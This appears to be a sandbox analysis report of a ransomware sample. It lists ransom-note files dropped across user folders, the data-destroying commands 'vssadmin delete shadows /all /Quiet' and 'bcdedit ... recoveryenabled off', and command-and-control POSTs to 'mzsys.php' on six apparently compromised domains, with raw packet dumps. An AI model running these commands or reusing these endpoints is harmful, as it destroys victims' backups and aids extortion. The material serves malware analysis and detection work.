Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Templates\excel4.xls
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\NetHood\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\My Documents\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Templates\wordpfct.wpd
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\History\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\History\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temp\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hhj.png
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a20372c 202c202c 202c202c   cept: 7, , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000080 (00128)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000090 (00144)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x000000a0 (00160)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000b0 (00176)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000c0 (00192)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000d0 (00208)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000e0 (00224)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000f0 (00240)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x00000100 (00256)   0a486f73 743a2068 6e622e6e 65740d0a   .Host: hnb.net..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   3634350d 0a436163 68652d43 6f6e7472   645..Cache-Contr
0x00000130 (00304)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000140 (00320)   64617461 3d303934 33383530 35454435   data=09438505ED5
0x00000150 (00336)   35423846 33314141 39383939 35453830   5B8F31AA98995E80
0x00000160 (00352)   34333934 44393635 44433846 33414538   4394D965DC8F3AE8
0x00000170 (00368)   37313846 30314230 43433738 46394542   718F01B0CC78F9EB
0x00000180 (00384)   32324642 35413332 41393932 32354445   22FB5A32A99225DE
0x00000190 (00400)   39334337 43394442 31413632 43393646   93C7C9DB1A62C96F
0x000001a0 (00416)   41354531 35453044 35454343 36314634   A5E15E0D5ECC61F4
0x000001b0 (00432)   46363139 31353043 33343142 37323135   F619150C341B7215
0x000001c0 (00448)   45353137 31453732 41433235 38353346   E5171E72AC25853F
0x000001d0 (00464)   31343035 33363541 45364339 43363436   1405365AE6C9C646
0x000001e0 (00480)   35423842 43343135 44344542 39343730   5B8BC415D4EB9470
0x000001f0 (00496)   42433131 35393744 33353634 35454641   BC11597D35645EFA
0x00000200 (00512)   42334632 30464139 43454143 43314144   B3F20FA9CEACC1AD
0x00000210 (00528)   43423645 41324437 44364143 44393532   CB6EA2D7D6ACD952
0x00000220 (00544)   30384138 44324344 32343138 39323138   08A8D2CD24189218
0x00000230 (00560)   32363131 39454430 46454634 35414230   26119ED0FEF45AB0
0x00000240 (00576)   41433933 30334336 31373736 37363235   AC9303C617767625
0x00000250 (00592)   36314136 30324531 36324338 36453241   61A602E162C86E2A
0x00000260 (00608)   34453641 35364633 42414535 38434242   4E6A56F3BAE58CBB
0x00000270 (00624)   41423146 41323030 39384430 39373638   AB1FA20098D09768
0x00000280 (00640)   41323538 46433237 43463344 46384546   A258FC27CF3DF8EF
0x00000290 (00656)   34343631 37334143 41373934 37443337   446173ACA7947D37
0x000002a0 (00672)   42373941 33413436 44393738 32324239   B79A3A46D97822B9
0x000002b0 (00688)   36363934 39373346 36424141 41334539   6694973F6BAAA3E9
0x000002c0 (00704)   31343431 32463638 45333638 37303338   14412F68E3687038
0x000002d0 (00720)   38323638 46394436 36354431 37423930   8268F9D665D17B90
0x000002e0 (00736)   30424441 32334642 45393346 33313937   0BDA23FBE93F3197
0x000002f0 (00752)   35313838 30424542 36413439 46424132   51880BEB6A49FBA2
0x00000300 (00768)   43314431 43334130 39363242 34453242   C1D1C3A0962B4E2B
0x00000310 (00784)   42323638 32453738 33423535 30323933   B2682E783B550293
0x00000320 (00800)   36413945 42303635 31413643 34313130   6A9EB0651A6C4110
0x00000330 (00816)   46343932 43304533 41354542 45313739   F492C0E3A5EBE179
0x00000340 (00832)   35324345 36343732 39363135 45464337   52CE64729615EFC7
0x00000350 (00848)   39443135 34434345 36353446 42333535   9D154CCE654FB355
0x00000360 (00864)   41333537 34444241 37463435 42364435   A3574DBA7F45B6D5
0x00000370 (00880)   46343339 38374439 42343234 45353744   F43987D9B424E57D
0x00000380 (00896)   39324130 30363641 44354334 38373237   92A0066AD5C48727
0x00000390 (00912)   38374339 42313043 37393533 37373441   87C9B10C7953774A
0x000003a0 (00928)   32313730 44313242 36334342 33454136   2170D12B63CB3EA6
0x000003b0 (00944)   38354145 32374432 33314443 39453144   85AE27D231DC9E1D
0x000003c0 (00960)   41413441 30                           AA4A0

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20372c 202c202c 202c202c   cept: 7, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2066 69726563 68656572   .Host: firecheer
0x00000100 (00256)   6c656164 6572732e 66720d0a 436f6e74   leaders.fr..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d303934 33383530 35454435 35423846   =09438505ED55B8F
0x00000150 (00336)   33314141 39383939 35453830 34333934   31AA98995E804394
0x00000160 (00352)   44393635 44433846 33414538 37313846   D965DC8F3AE8718F
0x00000170 (00368)   30314230 43433738 46394542 32324642   01B0CC78F9EB22FB
0x00000180 (00384)   35413332 41393932 32354445 39334337   5A32A99225DE93C7
0x00000190 (00400)   43394442 31413632 43393646 41354531   C9DB1A62C96FA5E1
0x000001a0 (00416)   35453044 35454343 36314634 46363139   5E0D5ECC61F4F619
0x000001b0 (00432)   31353043 33343142 37323135 45353137   150C341B7215E517
0x000001c0 (00448)   31453732 41433235 38353346 31343035   1E72AC25853F1405
0x000001d0 (00464)   33363541 45364339 43363436 35423842   365AE6C9C6465B8B
0x000001e0 (00480)   43343135 44344542 39343730 42433131   C415D4EB9470BC11
0x000001f0 (00496)   35393744 33353634 35454641 42334632   597D35645EFAB3F2
0x00000200 (00512)   30464139 43454143 43314144 43423645   0FA9CEACC1ADCB6E
0x00000210 (00528)   41324437 44364143 44393532 30384138   A2D7D6ACD95208A8
0x00000220 (00544)   44324344 32343138 39323138 32363131   D2CD241892182611
0x00000230 (00560)   39454430 46454634 35414230 41433933   9ED0FEF45AB0AC93
0x00000240 (00576)   30334336 31373736 37363235 36314136   03C61776762561A6
0x00000250 (00592)   30324531 36324338 36453241 34453641   02E162C86E2A4E6A
0x00000260 (00608)   35364633 42414535 38434242 41423146   56F3BAE58CBBAB1F
0x00000270 (00624)   41323030 39384430 39373638 41323538   A20098D09768A258
0x00000280 (00640)   46433237 43463344 46384546 34343631   FC27CF3DF8EF4461
0x00000290 (00656)   37334143 41373934 37443337 42373941   73ACA7947D37B79A
0x000002a0 (00672)   33413436 44393738 32324239 36363934   3A46D97822B96694
0x000002b0 (00688)   39373346 36424141 41334539 31343431   973F6BAAA3E91441
0x000002c0 (00704)   32463638 45333638 37303338 38323638   2F68E36870388268
0x000002d0 (00720)   46394436 36354431 37423930 30424441   F9D665D17B900BDA
0x000002e0 (00736)   32334642 45393346 33313937 35313838   23FBE93F31975188
0x000002f0 (00752)   30424542 36413439 46424132 43314431   0BEB6A49FBA2C1D1
0x00000300 (00768)   43334130 39363242 34453242 42323638   C3A0962B4E2BB268
0x00000310 (00784)   32453738 33423535 30323933 36413945   2E783B5502936A9E
0x00000320 (00800)   42303635 31413643 34313130 46343932   B0651A6C4110F492
0x00000330 (00816)   43304533 41354542 45313739 35324345   C0E3A5EBE17952CE
0x00000340 (00832)   36343732 39363135 45464337 39443135   64729615EFC79D15
0x00000350 (00848)   34434345 36353446 42333535 41333537   4CCE654FB355A357
0x00000360 (00864)   34444241 37463435 42364435 46343339   4DBA7F45B6D5F439
0x00000370 (00880)   38374439 42343234 45353744 39324130   87D9B424E57D92A0
0x00000380 (00896)   30363641 44354334 38373237 38374339   066AD5C4872787C9
0x00000390 (00912)   42313043 37393533 37373441 32313730   B10C7953774A2170
0x000003a0 (00928)   44313242 36334342 33454136 38354145   D12B63CB3EA685AE
0x000003b0 (00944)   32374432 33314443 39453144 41413441   27D231DC9E1DAA4A
0x000003c0 (00960)   302d6a01                              0-j.

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20372c 202c202c 202c202c   cept: 7, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a206c 61646965 73646568   .Host: ladiesdeh
0x00000100 (00256)   61616e2e 62650d0a 436f6e74 656e742d   aan.be..Content-
0x00000110 (00272)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000120 (00288)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000130 (00304)   61636865 0d0a0d0a 64617461 3d303934   ache....data=094
0x00000140 (00320)   33383530 35454435 35423846 33314141   38505ED55B8F31AA
0x00000150 (00336)   39383939 35453830 34333934 44393635   98995E804394D965
0x00000160 (00352)   44433846 33414538 37313846 30314230   DC8F3AE8718F01B0
0x00000170 (00368)   43433738 46394542 32324642 35413332   CC78F9EB22FB5A32
0x00000180 (00384)   41393932 32354445 39334337 43394442   A99225DE93C7C9DB
0x00000190 (00400)   31413632 43393646 41354531 35453044   1A62C96FA5E15E0D
0x000001a0 (00416)   35454343 36314634 46363139 31353043   5ECC61F4F619150C
0x000001b0 (00432)   33343142 37323135 45353137 31453732   341B7215E5171E72
0x000001c0 (00448)   41433235 38353346 31343035 33363541   AC25853F1405365A
0x000001d0 (00464)   45364339 43363436 35423842 43343135   E6C9C6465B8BC415
0x000001e0 (00480)   44344542 39343730 42433131 35393744   D4EB9470BC11597D
0x000001f0 (00496)   33353634 35454641 42334632 30464139   35645EFAB3F20FA9
0x00000200 (00512)   43454143 43314144 43423645 41324437   CEACC1ADCB6EA2D7
0x00000210 (00528)   44364143 44393532 30384138 44324344   D6ACD95208A8D2CD
0x00000220 (00544)   32343138 39323138 32363131 39454430   2418921826119ED0
0x00000230 (00560)   46454634 35414230 41433933 30334336   FEF45AB0AC9303C6
0x00000240 (00576)   31373736 37363235 36314136 30324531   1776762561A602E1
0x00000250 (00592)   36324338 36453241 34453641 35364633   62C86E2A4E6A56F3
0x00000260 (00608)   42414535 38434242 41423146 41323030   BAE58CBBAB1FA200
0x00000270 (00624)   39384430 39373638 41323538 46433237   98D09768A258FC27
0x00000280 (00640)   43463344 46384546 34343631 37334143   CF3DF8EF446173AC
0x00000290 (00656)   41373934 37443337 42373941 33413436   A7947D37B79A3A46
0x000002a0 (00672)   44393738 32324239 36363934 39373346   D97822B96694973F
0x000002b0 (00688)   36424141 41334539 31343431 32463638   6BAAA3E914412F68
0x000002c0 (00704)   45333638 37303338 38323638 46394436   E36870388268F9D6
0x000002d0 (00720)   36354431 37423930 30424441 32334642   65D17B900BDA23FB
0x000002e0 (00736)   45393346 33313937 35313838 30424542   E93F319751880BEB
0x000002f0 (00752)   36413439 46424132 43314431 43334130   6A49FBA2C1D1C3A0
0x00000300 (00768)   39363242 34453242 42323638 32453738   962B4E2BB2682E78
0x00000310 (00784)   33423535 30323933 36413945 42303635   3B5502936A9EB065
0x00000320 (00800)   31413643 34313130 46343932 43304533   1A6C4110F492C0E3
0x00000330 (00816)   41354542 45313739 35324345 36343732   A5EBE17952CE6472
0x00000340 (00832)   39363135 45464337 39443135 34434345   9615EFC79D154CCE
0x00000350 (00848)   36353446 42333535 41333537 34444241   654FB355A3574DBA
0x00000360 (00864)   37463435 42364435 46343339 38374439   7F45B6D5F43987D9
0x00000370 (00880)   42343234 45353744 39324130 30363641   B424E57D92A0066A
0x00000380 (00896)   44354334 38373237 38374339 42313043   D5C4872787C9B10C
0x00000390 (00912)   37393533 37373441 32313730 44313242   7953774A2170D12B
0x000003a0 (00928)   36334342 33454136 38354145 32374432   63CB3EA685AE27D2
0x000003b0 (00944)   33314443 39453144 41413441 30413441   31DC9E1DAA4A0A4A
0x000003c0 (00960)   302d6a01                              0-j.

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a20372c 202c202c 202c202c   cept: 7, , , , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000060 (00096)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000070 (00112)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000080 (00128)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000a0 (00160)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000b0 (00176)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000c0 (00192)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000d0 (00208)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000e0 (00224)   0a486f73 743a2063 686f6e62 75726963   .Host: chonburic
0x000000f0 (00240)   6f6f702e 6e65740d 0a436f6e 74656e74   oop.net..Content
0x00000100 (00256)   2d4c656e 6774683a 20363435 0d0a4361   -Length: 645..Ca
0x00000110 (00272)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000120 (00288)   63616368 650d0a0d 0a646174 613d3039   cache....data=09
0x00000130 (00304)   34333835 30354544 35354238 46333141   438505ED55B8F31A
0x00000140 (00320)   41393839 39354538 30343339 34443936   A98995E804394D96
0x00000150 (00336)   35444338 46334145 38373138 46303142   5DC8F3AE8718F01B
0x00000160 (00352)   30434337 38463945 42323246 42354133   0CC78F9EB22FB5A3
0x00000170 (00368)   32413939 32323544 45393343 37433944   2A99225DE93C7C9D
0x00000180 (00384)   42314136 32433936 46413545 31354530   B1A62C96FA5E15E0
0x00000190 (00400)   44354543 43363146 34463631 39313530   D5ECC61F4F619150
0x000001a0 (00416)   43333431 42373231 35453531 37314537   C341B7215E5171E7
0x000001b0 (00432)   32414332 35383533 46313430 35333635   2AC25853F1405365
0x000001c0 (00448)   41453643 39433634 36354238 42433431   AE6C9C6465B8BC41
